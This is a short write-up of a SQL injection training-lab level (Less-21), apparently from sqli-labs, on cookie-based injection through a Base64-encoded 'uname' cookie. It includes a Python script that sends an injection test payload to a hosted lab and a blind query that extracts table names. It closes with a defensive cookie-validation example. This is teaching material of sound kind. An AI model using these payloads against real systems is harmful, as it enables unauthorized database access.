Less-21

This level is described as a cookie injection.

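  • `%3d` URL-decodes to `=`.
  • In Base64, the value 0 maps to A and the value 27 maps to b. Every 3 input characters produce 4 Base64 characters. If the string being encoded, taken in groups of 3, has 1 or 2 characters left over, the special character "=" is used to pad the output to the 4 Base64 characters.
  • https://base64.us/ is an online Base64 site.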

  1. # -*- coding: utf-8 -*-
    import base64
    import requests as req

    url = 'https://sql.alienwares.top/Less-21/index.php'
    # Boolean test string (renamed from `str`, which shadowed the built-in)
    payload = "admin') and 1=2#"
    # Base64-encode the value before placing it in the uname cookie
    cookie = base64.b64encode(payload.encode('utf-8'))
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0",
        "Cookie": 'uname=' + cookie.decode('utf-8'),
    }
    res = req.get(url, headers=header)
    # if 'Delete Your Cookie' in res.content.decode('utf-8'):
    #     print('success')
    # else:
    #     print('error')

    # slap1.jpg in the response is treated as the failure marker
    if '../images/slap1.jpg' in res.content.decode('utf-8'):
        print('error')
    else:
        print('success')
  2. select mid((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()),1,1)='e'
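
A server-side check for the Base64-encoded `uname` cookie discussed above, as an added example that is not part of the original post: it URL-decodes `%3d` to `=`, Base64-decodes strictly, and applies an allow-list to the decoded value rather than to the Base64 text. The function names and the username pattern are assumptions, and the sample headers are constructed.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Assumed policy: usernames are 1-32 letters, digits, '_', '.' or '-'.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def cookie_value(cookie_header, name):
    """Return the raw value of one cookie from a Cookie header, or None."""
    for part in cookie_header.split(";"):
        key, sep, value = part.strip().partition("=")  # value keeps any '=' padding
        if sep and key == name:
            return value
    return None


def decode_uname(cookie_header):
    """Return the decoded uname value, or None if absent or malformed."""
    raw = cookie_value(cookie_header, "uname")
    if raw is None:
        return None
    raw = unquote(raw)  # %3d -> '=' (Base64 padding)
    try:
        # validate=True rejects characters outside the Base64 alphabet
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def is_valid_uname(cookie_header):
    """Allow-list check on the decoded value, not on the Base64 text."""
    value = decode_uname(cookie_header)
    return value is not None and USERNAME_RE.fullmatch(value) is not None


def make_cookie(value):
    """Build a Cookie header the same way the script on this page does."""
    return "uname=" + base64.b64encode(value.encode("utf-8")).decode("ascii")


if __name__ == "__main__":
    samples = [                              # constructed sample headers
        "uname=YWRtaW4%3d",                  # "admin" with URL-encoded padding
        make_cookie("admin') and 1=2#"),     # test string from the page
        "uname=not*base64",                  # not valid Base64
    ]
    for header in samples:
        print(header, "->", repr(decode_uname(header)), is_valid_uname(header))
```

Input validation of this kind complements parameterized queries and does not replace them.
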
Original article: https://www.cnblogs.com/hackering/p/14279029.html